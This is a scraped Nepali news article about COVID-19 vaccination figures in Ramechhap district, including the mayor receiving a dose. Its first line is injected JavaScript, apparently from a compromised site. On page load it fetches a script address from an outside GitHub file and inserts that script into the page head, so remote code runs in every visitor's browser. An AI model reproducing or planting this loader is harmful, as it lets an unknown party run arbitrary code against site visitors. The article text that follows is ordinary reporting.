;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछापमा आजसम्म ११ सय ४२ जनाले कोरोना बिरुद्धको खोप लगाए : यस्तो छ तयारी – जुनेली न्युज
बुधबार, असार १२, २०८२
  • होमपेज
  • रामेछापमा आजसम्म ११ सय ४२ जनाले कोरोना बिरुद्धको खोप लगाए : यस्तो छ तयारी
जुनेली बिशेष

रामेछापमा आजसम्म ११ सय ४२ जनाले कोरोना बिरुद्धको खोप लगाए : यस्तो छ तयारी

खोप लगाउदै रामेछाप नगरप्रमुख नरबहादुर थापामगर

फागुन ०२,

रामेछाप । रामेछापमा आज ४९ जनाले कोरोना भाइरस संक्रमण बिरुद्धको खोप लिएका छन् । आजबाट सुरु भएको दोस्रो चरणको खोप अभियान अन्तर्गत ३६ जना पुरुष र १३ जना महिला गरि कूल ४९ जनाले खोप लगाएको जिल्ला अस्पताल रामेछापले जनाएको छ । खोप लगाउनेमा ४ जना जनप्रतिनिधि रहेका छन् । खोप अभियान अन्तर्गत बैंकका कर्मचारी, निजामती कर्मचारी, सरकारी तथा गैरसरकारी कार्यालयका कर्मचारीहरुलाई खोप लगाइएको जिल्ला अस्पतालले विज्ञप्ति मार्फत जनाएको छ । रामेछाप नगरपालिकाका नगरप्रमुख नरबहादुर थापामगरले खोप लगाएका हुन् ।

साथै अस्पतालले खोप सुरक्षित रहेको भन्दै लगाउन सबैलाई आह्वन गरेको छ । जिल्ला अस्पतालका प्रमुख जितेन्द्र कर्णले शिक्षा तथा अभिभावकहरुले पनि कोरोनाको खोप लगाउनू पर्यो भनेर माग गरेको जानकारी दिए । आजसम्ममा जिल्लामा एक हजार एक सय ४२ जना पुगेको छ । दोस्रो चरणको खोप अभियानमा २१ सय भन्दा बढीले खोप लगाउन नाम टिपाएका छन् ।

पहिलो चरणमा गत माघ १४ गतेदेखि सुरु भएको खोप अभियान ११ दिन चलेको थियो ।

यस्तो छ खोप लगाउने तयारी‍‍‍‍…………….

No description available.

फेसबुक प्रतिक्रियाहरु